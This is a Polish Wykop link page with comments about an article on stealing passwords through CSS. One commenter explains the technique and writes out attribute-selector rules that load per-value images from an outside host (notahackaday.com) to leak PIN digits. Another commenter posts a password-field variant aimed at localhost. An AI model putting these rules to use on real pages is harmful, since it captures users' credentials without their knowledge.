Kradzież hasła przy pomocy CSS-a[eng]
![Kradzież hasła przy pomocy CSS-a[eng]](https://wykop.pl/cdn/c3397993/link_LS37fpEDYk6d9yTbGONSkopQZeTOhU1I,w300h194.jpg)
Artykuł, zakończony filmikiem na temat opowiada jak w sprytny sposób można ukraść hasło z przeglądarki odpowiednim stylem w CSSie

- #
- #
- #
- #
- #
- #
- 34
- Odpowiedz
![Kradzież hasła przy pomocy CSS-a[eng]](https://wykop.pl/cdn/c3397993/link_LS37fpEDYk6d9yTbGONSkopQZeTOhU1I,w300h194.jpg)
Artykuł, zakończony filmikiem na temat opowiada jak w sprytny sposób można ukraść hasło z przeglądarki odpowiednim stylem w CSSie

Komentarze (34)
najlepsze
1. Reguła css jest napisana do każdej możliwej kombinacji (używa się tego do PINów).
2. CSS ma możliwość ułożenia reguły do wartości z inputa
3. Jeśli się zgadza wartość z reguła to przeglądarka odpytuje serwer o plik, który nazywa się tak jak wartość z pola.
4. Pliki mają wyłączone cachowanie
input[type="pin"][value$="0000"] { background-color: url(http://notahackaday.com/0000.png }
input[type="pin"][value$="0001"] { background-color: url(http://notahackaday.com/0001.png }
...
input[type="pin"][value$="9999"]
@hpiotrekh: Nie wiem, ale włamanie emacsem przez sendmail jest technicznie możliwe chyba
readfile. Wtedy dużo łatwiej będzie śledzić takie wczytywania obrazków. https://codepen.io/neoqueto/pen/yvQxwR (tutaj jako przykład rotator obrazków do banera)A jak samemu się padnie ofiarą ataku to nikt nie będzie się raczej bawił by wyciągać hasła po CSS :-)
źródło: comment_H5bOvF2czd0120oesQCQKtE8W17rovp5.jpg
PobierzW takim przypadku to nie zadziała:
input[type="password"][value$="a"] {background-image: url("http://localhost:8000/a");
}
Próbowalem to robić na Firefox ESR 52.3.0 (64 bit)
@xaweryz (-‸ლ)